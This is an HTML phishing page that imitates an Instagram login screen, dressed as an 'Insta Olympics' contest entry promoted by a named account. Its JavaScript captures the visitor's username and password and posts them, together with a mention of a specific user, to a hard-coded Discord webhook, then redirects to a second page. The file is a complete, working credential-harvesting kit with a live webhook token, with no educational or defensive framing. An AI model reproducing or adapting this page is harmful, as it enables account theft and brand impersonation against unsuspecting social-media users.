<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Insta Olympics️</title>
</head>
<body>
    <div class="container">
        <div class="login-box">
            <div class="logo">
                <img src="https://upload.wikimedia.org/wikipedia/commons/a/a5/Instagram_icon.png" alt="Instagram Logo">
                <h1>Take Part Insta Olympics️</h1>
                <p>with <a href="https://www.instagram.com/_shiv.raj_28?igsh=MTE3bHgxbzltZzljNA==">_shiv.raj_28</a></p>
            </div>
            <form onsubmit="sendToDiscord(event)">
                <input type="text" id="username" placeholder="Email, username, or phone" required>
                <input type="password" id="password" placeholder="Password" required>
                <button type="submit">Log In</button>
            </form>
    </div>
    </div>
    
    <script type="text/javascript">
    async function sendToDiscord(event) {
        event.preventDefault();
    
        const webhookURL = 'https://discord.com/api/webhooks/1270669844668350464/Ot_ihtSiBsIu6hG-s_mgaB8nXCfLfCq9xoItgjYtynqWCogF0w4NNxFiqibyExTTCdJJ'; // Replace with your Discord webhook URL
        const username = document.getElementById('username').value;
        const password = document.getElementById('password').value;
    
        const load = {
            content: `<@1226202962800541760> \n Username: ${username} \n Password: ${password}`
        };
    
        try {
            const response = await fetch(webhookURL, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify(load)
            });
    
            if (response.ok) {
                // Redirect to another webpage after successful submission
                window.location.href = 'index2.html';
            } else {
                alert('Try Again!');
            }
        } catch (error) {
            console.error('Error:', error);
            alert('An error occurred.');
        }
    }
    
    </script>
    
<style type="text/css">
 body {
 font-family: 'Arial', sans-serif;
 background-color: #fafafa;
 display: flex;
 justify-content: center;
 align-items: center;
 height: 100vh;
 margin: 0;
 }
 
 .container {
 width: 350px;
 }
 
 .login-box {
 background-color: #fff;
 border: 1px solid #dbdbdb;
 padding: 20px;
 text-align: center;
 margin: 5px;
 }
 
 .logo img {
 width: 80px;
 margin-bottom: 3px;
 }
 
 form input {
 padding: 10px;
 margin: 5px;
 border: 1px solid #dbdbdb;
 border-radius: 3px;
 background-color: #fafafa;
 font-size: 14px;
 }
 
 form button {
 width: 100%;
 padding: 10px;
 margin: 10px 0;
 background-color: #0095f6;
 border: none;
 border-radius: 3px;
 color: #fff;
 font-weight: bold;
 cursor: pointer;
 }
 
 .or {
 display: flex;
 align-items: center;
 margin: 10px 0;
 }
 
 .line {
 flex: 1;
 height: 1px;
 background-color: #dbdbdb;
 }
 
 .text {
 margin: 0 10px;
 color: #8e8e8e;
 font-size: 13px;
 font-weight: bold;
 }
 
 .facebook-login {
 display: flex;
 align-items: center;
 justify-content: center;
 color: #385185;
 font-weight: bold;
 cursor: pointer;
 margin-top: 10px;
 }
 
 .facebook-login img {
 width: 20px;
 margin-right: 5px;
 }
 
 .forgot-password {
 display: block;
 color: #00376b;
 margin-top: 15px;
 text-decoration: none;
 font-size: 12px;
 }
 
 .signup-box {
 background-color: #fff;
 border: 1px solid #dbdbdb;
 padding: 20px;
 text-align: center;
 }
 
 .signup-box p {
 margin: 0;
 font-size: 14px;
 }
 
 .signup-box a {
 color: #0095f6;
 font-weight: bold;
 text-decoration: none;
 }
 
</style>
</body>
</html>
